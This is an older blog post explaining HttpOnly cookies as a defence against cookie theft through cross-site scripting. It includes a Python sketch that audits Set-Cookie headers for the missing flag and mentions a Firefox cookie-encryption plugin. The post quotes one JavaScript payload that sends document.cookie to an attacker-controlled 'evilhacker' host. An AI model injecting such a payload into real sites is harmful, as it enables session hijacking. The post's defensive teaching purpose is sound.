January 25, 2007 - 09:25 UTC - Tags: HttpOnly cookie
Vidar wrote an interesting article pointing me to HttpOnly cookies. Microsoft created this extension to the cookie standard to allow servers to issue cookies with a special HttpOnly flag. This flag makes the cookie inaccessible to JavaScript in browsers that support it (currently only newer versions of IE support this feature fully).
The set-cookie header looks like this:
Set-Cookie: USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly
Microsoft has an article about these cookies here:
Mitigating Cross-site Scripting With HTTP-only Cookies
This is really interesting, as it may help to reduce the risk of session stealing. Hackers often exploit cross-site scripting vulnerabilities to steal cookies by using JavaScript to send the cookie from the victim's browser to a site controlled by the attacker:
document.location.href="http://evilhacker/cookiestealer?cookie=" + document.cookie;
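As an added example (not code from the original post), here is a small audit that parses Set-Cookie headers in the format shown above and reports which cookies are still readable from document.cookie because the HttpOnly attribute is missing. The sample headers are constructed; the first is the post's own example.

```python
# Added example: parse Set-Cookie headers and flag cookies a script could read
# because the HttpOnly attribute is absent. Sample headers below are constructed.
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class Cookie:
    name: str
    value: str
    attributes: Dict[str, Optional[str]] = field(default_factory=dict)

    @property
    def http_only(self) -> bool:
        # Attribute names are case-insensitive: "httponly" and "HttpOnly" both count.
        return "httponly" in self.attributes


def parse_set_cookie(header: str) -> Cookie:
    """Split a Set-Cookie header value into its name=value pair and its attributes."""
    # The expires date contains a comma but never a semicolon, so ';' is a safe separator.
    pair, *attrs = header.split(";")
    name, _, value = pair.strip().partition("=")
    attributes: Dict[str, Optional[str]] = {}
    for attr in attrs:
        attr = attr.strip()
        if not attr:
            continue
        key, sep, val = attr.partition("=")
        # Flag attributes such as HttpOnly and Secure carry no value.
        attributes[key.strip().lower()] = val.strip() if sep else None
    return Cookie(name.strip(), value.strip(), attributes)


def cookies_exposed_to_script(headers: List[str]) -> List[str]:
    """Return the names of cookies issued without HttpOnly (readable via document.cookie)."""
    return [c.name for c in map(parse_set_cookie, headers) if not c.http_only]


# Constructed sample responses: the first is the post's own header, the others lack the flag.
SAMPLE_HEADERS = [
    "USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly",
    "SESSIONID=abc123; Path=/; Secure",
    "theme=dark",
]

if __name__ == "__main__":
    for cookie_name in cookies_exposed_to_script(SAMPLE_HEADERS):
        print(f"cookie {cookie_name!r} is readable from JavaScript: add HttpOnly")
```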
Stefan Esser has created a proof-of-concept Firefox plugin that generates an encryption key on first startup, hooks into the HTTP pipeline and AES-encrypts/decrypts the cookies. From JavaScript only the encrypted version of the HttpOnly cookies is available, and since the key is generated uniquely for each computer, the cookies cannot be used (unless cracked) on other computers.